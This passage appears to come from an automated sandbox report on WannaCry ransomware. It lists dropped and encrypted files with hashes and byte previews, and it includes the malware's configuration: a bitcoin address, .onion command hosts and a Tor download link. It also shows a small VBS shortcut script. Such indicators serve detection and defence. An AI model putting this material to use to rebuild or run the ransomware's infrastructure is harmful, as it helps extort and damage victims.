SSDEEP:	6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
MD5:	E5DF3824F2FCAD0C75FD601FCF37EE70
SHA1:	902418A4C5F3684DBA5E3246DE8C4E21C92D674E
SHA-256:	5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
SHA-512:	7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!.....`...4...............p.....b......................................@... ..............................@...............................p...............................`......................pB...............................text...._.......`..................`.P`.data........p.......f..............@.`..rdata..xr.......t...j..............@.`@.bss..................................`..edata...........0..................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc.......p....... ..............@.0B/4......P............:..............@.@B/19.................>..............@..B/31..........0......................@..B/45..........P......................@..B/57.....<....p......................@.0B/70....."...........................@..B/81.....B...............

C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	411369
Entropy (8bit):	5.909395689751269
Encrypted:	false
SSDEEP:	3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
MD5:	6D6602388AB232CA9E8633462E683739
SHA1:	41072CC983568D8FEEB3E18C4B74440E9D44019A
SHA-256:	957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
SHA-512:	B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........b.........!...............................l......................... ............@... .................................................................h...................................................L................................text...............................`.P`.data...............................@.`..rdata..DR... ...T..................@.`@.bss..................................`..edata...............T..............@.0@.idata...............p..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..h...........................@.0B/4......8...........................@.@B/19.....W.... ......................@..B/31......%.......&...v..............@..B/45......&...0...(..................@..B/57..........`......................@.0B/70.....v....p......................@..B/81.....................

C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	523262
Entropy (8bit):	5.7796587531390795
Encrypted:	false
SSDEEP:	6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
MD5:	73D4823075762EE2837950726BAA2AF9
SHA1:	EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
SHA-256:	9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
SHA-512:	8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....B...p...............`.....l.........................p......5(....@... .................................l....................................................................................................................text...X@.......B..................`.P`.data...8....`.......H..............@.0..rdata..<....p.......J..............@.`@.bss..................................`..edata...............Z..............@.0@.idata..l............f..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..reloc...............p..............@.0B/4...................v..............@.@B/19.....Du.......v..................@..B/31....._o...p...p..................@..B/45..................l..............@..B/57.....\|-...p......................@.0B/70.....J...........................@..B/81.................(..

C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92599
Entropy (8bit):	5.351249974009154
Encrypted:	false
SSDEEP:	1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
MD5:	78581E243E2B41B17452DA8D0B5B2A48
SHA1:	EAEFB59C31CF07E60A98AF48C5348759586A61BB
SHA-256:	F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
SHA-512:	332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........4...............0.....h................................<.....@... ......................`..i....p..................................@....................................................q...............................text...............................`.P`.data........0......."..............@.0..rdata..h....@.......$..............@.0@.bss.........P........................`..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.... ............4..............@.0..reloc..@............6..............@.0B/4...................:..............@.@B/19.....n\|.......~...<..............@..B/31..........@......................@..B/45..........`......................@..B/57.....$...........................@.0B/70....."...........................@..B/81.....w...............

C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	711459
Entropy (8bit):	5.884120014912355
Encrypted:	false
SSDEEP:	12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
MD5:	A12C2040F6FDDD34E7ACB42F18DD6BDC
SHA1:	D7DB49F1A9870A4F52E1F31812938FDEA89E9444
SHA-256:	BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
SHA-512:	FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..y .....!..............................@n......................... .......4....@... ......................0..m)...`...4......<.......................85..................................................,g...............................text...............................`.P`.data....-..........................@.`..rdata.......@.......0..............@.`@.bss....d.... ........................`..edata..m)...0...*..................@.0@.idata...4...`...6...6..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..rsrc...<............p..............@.0..reloc..85.......6...v..............@.0B/4..................................@.@B/19.....n\|... ...~..................@..B/31..................,..............@..B/45..................B..............@..B/57.....$............T..............@.0B/70....."............\..

C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3098624
Entropy (8bit):	6.512654975680739
Encrypted:	false
SSDEEP:	49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
MD5:	FE7EB54691AD6E6AF77F8A9A0B6DE26D
SHA1:	53912D33BEC3375153B7E4E68B78D66DAB62671A
SHA-256:	E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
SHA-512:	8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\TaskData\Tor\tor.exe

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3098624
Entropy (8bit):	6.512654975680739
Encrypted:	false
SSDEEP:	49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
MD5:	FE7EB54691AD6E6AF77F8A9A0B6DE26D
SHA1:	53912D33BEC3375153B7E4E68B78D66DAB62671A
SHA-256:	E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
SHA-512:	8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\TaskData\Tor\zlib1.dll

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	107520
Entropy (8bit):	6.440165833134522
Encrypted:	false
SSDEEP:	1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
MD5:	FB072E9F69AFDB57179F59B512F828A4
SHA1:	FE71B70173E46EE4E3796DB9139F77DC32D2F846
SHA-256:	66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
SHA-512:	9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....&...................@.....b......................... ...........@... .....................................................................................................................$................................text...d$.......&..................`.P`.data...X....@.......*..............@.0..rdata..pW...P...X...,..............@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\Desktop\UNKRLCVOHV.mp3

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.809923749401516
Encrypted:	false
SSDEEP:	24:7B5eHC52/xn2iQoT5apNR/X25YC3m5qmoq35Dj0DPy:7feHCZc6a1m5qmoqN1
MD5:	4038B5BB91D38AD2C88FF59EAE96D387
SHA1:	1C2A7B255B17D24EF189C50E22F3211253D72B72
SHA-256:	09475F14DE6937D4BFC2A5EF4848B39DF6B3F841768972D64821DDA69BFC4C0D
SHA-512:	25FFD1DFC7935196213E3D7853893954B790CD2D762BC88B1098F45297D6B0C4BB2EC08759A604E0F47413E078D148B16E970D58C18FAD779CEEC7665748C892
Malicious:	false
Reputation:	unknown
Preview:	i....}.DfN./.....H..T.h-.,.........v..#.:....U....G..-.....(&.Ew.&+..v.]./.?.....;.....Hi.H...6.4-....B.s.CF.M.W.....>...m.F.Y(.._.zTD..A..A.p.N.h....c....\...._...H.=.X$..8.j...(y.[.>.......f....=.,.?..B.At..._...`rb..Y ).w.5EVyG....x....../.b.e.^...9.p....?..b\|>+:...K..f{v....7.ON/8........w.....~....3...!1...E.\|...b......{.......s.K.y..4.....6...,...==f..j..A.._F.5.P...::..j.~..4R....b/...sZ9IqG...8..0.....3....7...5.g7z..&.........}.A...`..7....N......)n.)...sh..Pn....^I:...=.d.zZ...8.~3.S....S...)....PsJ9..P..N.....f.Wtu.<...v.\|d..Be..+....C[b.o.J...-...)..hQ.{.]..Z1.;..BE...'<.%=...>.Y.{.lu.y..B.)GwM..HP....9.rf)..o.)..W..u...-w...W.A.d..S...N....i.^.o..5.....q'J......y..6s}+zS.7X..G...).xXF-.V.Xi..\|.!...\|..".e..j..B./.`3.Pr.......-..N..`....:,pt.#H..%.9iYO..'O?..~...5.L..W.l.D.k...z.p.r...s.F20...i.C....A...7..s\.A.7..^...pE...+u..z.V=B...@..,%...........b....s..8.OPb.............E=...M..L..l.\.....3q.>d..Ee}..C.,.7t......].}..

C:\Users\user\Desktop\UNKRLCVOHV.mp3.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.845122805346617
Encrypted:	false
SSDEEP:	24:bk5b7Vvgj4/bFvXkVNIlpN3pgdE8tktodhaVm1GO52qOtvVXevy2RUdCDjDcjS6H:bk5b7VvV/pcvIpNudXtX8BqOtidqdCDG
MD5:	C4EFE298F8BDFEDB0E19386B5BAB7874
SHA1:	5F67D49E0BBFE11B9CEC23D6DAE5D03099A926CF
SHA-256:	F92F39BF624F34AC7F57CD45B20D057E8C7C57722E440B038526473105666323
SHA-512:	2878A1A416E43A54657D702E13D434378C059875A4D26CB40852B1086056291B01385638818941887CE29D9581B3B78949AF4527E7A05F37EBAF2B39F4DF44E4
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....(...t..Y..&.a.Myz....eO....PJ"...6PL...^.%.y..\|..#..Cf..N(.))...tC?R...G.VTf..?$.mL....l.....!.....9J.........hqt..{...\.."u.@.aH.J...................U,:..S..W.(.X...{..^`...B..&^.......^..,.yo..e~B...'...T6...F......8....../.Z....6.w.(.:Dj..: ............y...3..).cr....r.Y...6/s.e[.]..7.5...@.......E.@ .....2..?y..o.E..i;rD..[..;e.u..I2....\2.7..KAj..VIYY...........)J..`+..$.L.....< i.4.NAjg..w.10.B....S<.3....Z..$/>.N...!...{......a7.,k.P...86p.J.]....].&..2.......+5.W8..5/..t...I....[.e....i.Q....].W<.Y.\.......h..../z]4.. .........,...\{...Q.....k.....&.... e......M..K...pGHp..0...D.....M...!kLO.'g8p...lg#.hg.4.L<M".@.e......&U~.I.^w..x4.....B.3.Z.....F.t~W-.....[.?DCB.j@....U.....?+T..=..g2^t%.-.!....+..SW.b.'....]...x`.4.>..$.L.yc..._...ii3(..:9@h..W#.P.......B.>X..2H4..C...^..-....EA......hS....Xk.[$.23.Y.-....Yj...?w.-; .P>....W.!/.L...g:.L.O~).i.\|.\....q.y).B<0....\F.G......T...D;..bv..j..ik&.Gr..Cw......Ll.#.....

C:\Users\user\Desktop\UNKRLCVOHV.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.845122805346617
Encrypted:	false
SSDEEP:	24:bk5b7Vvgj4/bFvXkVNIlpN3pgdE8tktodhaVm1GO52qOtvVXevy2RUdCDjDcjS6H:bk5b7VvV/pcvIpNudXtX8BqOtidqdCDG
MD5:	C4EFE298F8BDFEDB0E19386B5BAB7874
SHA1:	5F67D49E0BBFE11B9CEC23D6DAE5D03099A926CF
SHA-256:	F92F39BF624F34AC7F57CD45B20D057E8C7C57722E440B038526473105666323
SHA-512:	2878A1A416E43A54657D702E13D434378C059875A4D26CB40852B1086056291B01385638818941887CE29D9581B3B78949AF4527E7A05F37EBAF2B39F4DF44E4
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....(...t..Y..&.a.Myz....eO....PJ"...6PL...^.%.y..\|..#..Cf..N(.))...tC?R...G.VTf..?$.mL....l.....!.....9J.........hqt..{...\.."u.@.aH.J...................U,:..S..W.(.X...{..^`...B..&^.......^..,.yo..e~B...'...T6...F......8....../.Z....6.w.(.:Dj..: ............y...3..).cr....r.Y...6/s.e[.]..7.5...@.......E.@ .....2..?y..o.E..i;rD..[..;e.u..I2....\2.7..KAj..VIYY...........)J..`+..$.L.....< i.4.NAjg..w.10.B....S<.3....Z..$/>.N...!...{......a7.,k.P...86p.J.]....].&..2.......+5.W8..5/..t...I....[.e....i.Q....].W<.Y.\.......h..../z]4.. .........,...\{...Q.....k.....&.... e......M..K...pGHp..0...D.....M...!kLO.'g8p...lg#.hg.4.L<M".@.e......&U~.I.^w..x4.....B.3.Z.....F.t~W-.....[.?DCB.j@....U.....?+T..=..g2^t%.-.!....+..SW.b.'....]...x`.4.>..$.L.yc..._...ii3(..:9@h..W#.P.......B.>X..2H4..C...^..-....EA......hS....Xk.[$.23.Y.-....Yj...?w.-; .P>....W.!/.L...g:.L.O~).i.\|.\....q.y).B<0....\F.G......T...D;..bv..j..ik&.Gr..Cw......Ll.#.....

C:\Users\user\Desktop\ZIPXYXWIOY.jpg

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.78663728028069
Encrypted:	false
SSDEEP:	24:58DLsb1xRSfSSNFF2fpj5HwBC860jAogoBCrP5IRYfM:56S1xRSRFF2fFNwBte8Y0
MD5:	00F603A59BDC9149E8A01687128FFEAD
SHA1:	D9D319CA1B33CE443903D42C06E1CCAC62B75E13
SHA-256:	7BCFA4F45990018AE0223AB724ADFE8238B1D5E9870654BD73A24C5AB6E642FB
SHA-512:	C1B3DFC01FEBF0656031967A025B9E9D7EA6DA507687A4603839200F248E1A8412828D9C49EB342D5DDD40489B48EE0DC035CBE1C449901A8B2FEA5D2C78D13F
Malicious:	false
Reputation:	unknown
Preview:	p..u..]..d...BY..[. ..+z.F.n.D....,......7....-].O..z..}T.!...z.m.....6...^./.54.wP.N./....\..9.0..o........BC....B.Gt....Q...uu..y.......9.FY'p...>w.]..+C.....5..fyR..Bm.\.D...p...+...p..\.i.w:^IJ.d".P.b..Wc).Dy...%..ny......D_e.p..q6h9....\|.OY..yz.F.'.. .;.AG?....C......2.;.........'.V..ghN.sm.K.c.....R. 0..2..>..ya...../.Dq..5)mw..0...;GD.he.2.=.%....j.`cq.W.xh.{..a..3...'...m...v.[o.{....@0.....3..........._...\b.....M1m5....(U.....P.TP...&?....E...W\...X.K.L...xw:...I.=..S..._m.;!~....?.X...$...Ay..#<....qx..2d.T.?=Z>d{....,t...{.,..;.pSY.^.q...rG.d~.......i.../...5.R..8...?.3.....N...HBy.hA&........):...8...Z.P.S.....Q.Jb..3"+.J.9=A..9G.j.F...z....t...!r...b...s..<..'.i.Y.%H=...K.....se...C......i.,...$.X.!......Mh...P0....bP.S../[%..~....P.&...<p..Ji.V5@L....D@..].q....!...'...Fz.O.Q....4~.@..xW.f...v\..y.O....o.^V?..N"'G0.}>.\..u..x...,jm..I.....}.U..}..>.8kL..........Q...M.[.t..5.....f.z#g..sz.....c\.2...p.7i..'.k+.c..vy..}..2yv<\.u

C:\Users\user\Desktop\ZIPXYXWIOY.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8575546995435985
Encrypted:	false
SSDEEP:	24:bkqbw+/ICqpjIS1LIJZFFLVo1WqF10JI7LtB87+HKEJ:bkqdg7T1LIXnLi1Wqz0afm+HKY
MD5:	76D38683207A18397D2DE53B2FE289A3
SHA1:	4E7C4BD33804904F06528790883F50B0F11E5CE8
SHA-256:	93A07ABE6ECA5B71CA14FFA0C68334BB3F3A6A84B04E0E77D37AED2472FB658C
SHA-512:	CBCB21465EEF1E7403EE0A3F44CC022C3497666053D36AA363246036E35710FB64D44F6E270932736C5FD44563B1AF0F80C6CA8489E8411B88D1DFEB59A87A91
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......$......n9...!9..sP..B...w.S.....l8.9..43{.kK^ 2..).&C.U..V....."....wk/..y..H.2..<....Jq.HAP.za..S..I.4X..ay....\|8_v......nj.,.U.-....6,..\|..,.=....W.....=....BD.QJ.&L...fSed"m`...b..4........5f5..6n...H.u..d.5#...$..;.9}.O.....}....0...BpX................K...jK.J...:...\.._..}..hgBg.9c\|.R'...o....sm....8h...Ms6..k...&+...O.6........@.Z.....^..._.Y......5@n@E....P.4....\|.d.t....=3...b....L..<~.....h.uA....\|P.........l.....t.....)..+.0]..r..P...!."$/.1.\|........z.bgbX4..}W.s.R}S{,}z.=.....,]&.ioguI....]T.(}.'..68..r..l..#>..A\|j.;....).....)k}Chp.Q._c2P9X.'.-..H..3x_FC..g.G.d.s..\|!.,S.Ll:.N....qC...'D...^8..5....X.;6m.9.......m...F.....x.....".MX{x..L..E.....g.R...]c.....ly.t.,..lk..xy.......U.^..5m.[..K.8cB[:..zX3..X...o...o.k.$..k..5..C.4.Y.i...7...:.......G.....JJb.}..9...R.B.i}Z..mM.cW.B..X.}O._.?...~.1.G..$-.....n.{.../........T....(.K.f..}'V..uT.(}[+......RZ."G.8$\.8W..$.+.0.........%..Pb.i_q...e.xgO.;........u.

C:\Users\user\Desktop\ZIPXYXWIOY.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8575546995435985
Encrypted:	false
SSDEEP:	24:bkqbw+/ICqpjIS1LIJZFFLVo1WqF10JI7LtB87+HKEJ:bkqdg7T1LIXnLi1Wqz0afm+HKY
MD5:	76D38683207A18397D2DE53B2FE289A3
SHA1:	4E7C4BD33804904F06528790883F50B0F11E5CE8
SHA-256:	93A07ABE6ECA5B71CA14FFA0C68334BB3F3A6A84B04E0E77D37AED2472FB658C
SHA-512:	CBCB21465EEF1E7403EE0A3F44CC022C3497666053D36AA363246036E35710FB64D44F6E270932736C5FD44563B1AF0F80C6CA8489E8411B88D1DFEB59A87A91
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......$......n9...!9..sP..B...w.S.....l8.9..43{.kK^ 2..).&C.U..V....."....wk/..y..H.2..<....Jq.HAP.za..S..I.4X..ay....\|8_v......nj.,.U.-....6,..\|..,.=....W.....=....BD.QJ.&L...fSed"m`...b..4........5f5..6n...H.u..d.5#...$..;.9}.O.....}....0...BpX................K...jK.J...:...\.._..}..hgBg.9c\|.R'...o....sm....8h...Ms6..k...&+...O.6........@.Z.....^..._.Y......5@n@E....P.4....\|.d.t....=3...b....L..<~.....h.uA....\|P.........l.....t.....)..+.0]..r..P...!."$/.1.\|........z.bgbX4..}W.s.R}S{,}z.=.....,]&.ioguI....]T.(}.'..68..r..l..#>..A\|j.;....).....)k}Chp.Q._c2P9X.'.-..H..3x_FC..g.G.d.s..\|!.,S.Ll:.N....qC...'D...^8..5....X.;6m.9.......m...F.....x.....".MX{x..L..E.....g.R...]c.....ly.t.,..lk..xy.......U.^..5m.[..K.8cB[:..zX3..X...o...o.k.$..k..5..C.4.Y.i...7...:.......G.....JJb.}..9...R.B.i}Z..mM.cW.B..X.}O._.?...~.1.G..$-.....n.{.../........T....(.K.f..}'V..uT.(}[+......RZ."G.8$\.8W..$.+.0.........%..Pb.i_q...e.xgO.;........u.

C:\Users\user\Desktop\b.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
Category:	dropped
Size (bytes):	1440054
Entropy (8bit):	0.3363393123555661
Encrypted:	false
SSDEEP:	384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
MD5:	C17170262312F3BE7027BC2CA825BF0C
SHA1:	F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
SHA-256:	D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
SHA-512:	C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
Malicious:	false
Reputation:	unknown
Preview:	BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\c.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	modified
Size (bytes):	780
Entropy (8bit):	2.3895244319510853
Encrypted:	false
SSDEEP:	6:cy+IQoKvbHaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:cLdHaRVcKKfm2MYS3sUQqGLGeTEV
MD5:	9A313B1F741CAD14F6C8992E788CFFF3
SHA1:	DF71759CC457AE16B3C68CB319AE489D25C15533
SHA-256:	347E516C08EA1A8B2CFFF0521B702DD7156915F86BB7C6E432F27FAD5779EFA0
SHA-512:	0F930317ED8155D57E3AAA154C8ECBA1276CA439FA188AB449BCA5F8FD909730BD865053DD04D6BB38EF0DEF7E81B19F841D51130573FAC13D5B46105B5F6C8D
Malicious:	false
Reputation:	unknown
Preview:	............................................................................................................3..d...........C......................................................12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................

C:\Users\user\Desktop\f.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	752
Entropy (8bit):	5.119427760977579
Encrypted:	false
SSDEEP:	12:oRjtVwuVwuVwuVwuVwuVwuVwuVwieV2/RiqejDUBVwuVwuVwuVwuVwmCojHXy8IK:oPVwuVwuVwuVwuVwuVwuVwuVwhV2Ahwp
MD5:	27A308DFC6A451B70EBE2DD82634028F
SHA1:	A6A3C00F8EE9322975812BB8434E589C8EF71ED2
SHA-256:	4F922085216AC04E42B006D53B26F1EFC4CF0668E87C61379C514FD82A748F4D
SHA-512:	68218DD6DD4D0B7ABA325CAAB8E81BF04851F369E121E3E5995E29C598FC10AC2D74B9F9408A8B90F8DCF68F326CA45B04DDF3E8838C1A993BCB7F2219C81189
Malicious:	false
Reputation:	unknown
Preview:	C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRY..C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRY..C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{C5106F55-DE69-4257-BD69-461E3E514242}mt16400656.png.WNCRY..

C:\Users\user\Desktop\m.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	199
Entropy (8bit):	4.993433402537439
Encrypted:	false
SSDEEP:	3:gponhvDCKFcsDONy+WlynJ96JS2x9rbPONy+WlynJSK2Fvn:e+hvbnRoJgJSoPnRoJSK2Fv
MD5:	BC117AC292350CB5C49A0D1660AFF679
SHA1:	FB6A629B267BBF4E7E4BC63B299F92DC1E518D4D
SHA-256:	E7325F2A555AE1A1694951B7782C4159013597C2D5BF480CC091C6A0E66BFC64
SHA-512:	B66227CF3944AF105818176FA43F628F89E4393B372949BC86A7513E11B62209B96B169C33E836E32C8BBA4387B78844A9FB08F37F62EC1E05DEF2F2BF89B093
Malicious:	true
Reputation:	unknown
Preview:	SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..

C:\Users\user\Desktop\m.vbs.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	488
Entropy (8bit):	7.594800055117178
Encrypted:	false
SSDEEP:	12:bkEDSSdi7PbHArUPD+wWb8bsNMrz4H9peNVTwMUw27:bkMpigrcAQmY6
MD5:	7749023C8518BF1C76373559DFA88BEE
SHA1:	67D070183803C3D966A6879A6F48906FE1853107
SHA-256:	C43BB7B23661A3C8C094350816B6F6DE94F0DFAB2D4EC57E4EC88B7A3265C29E
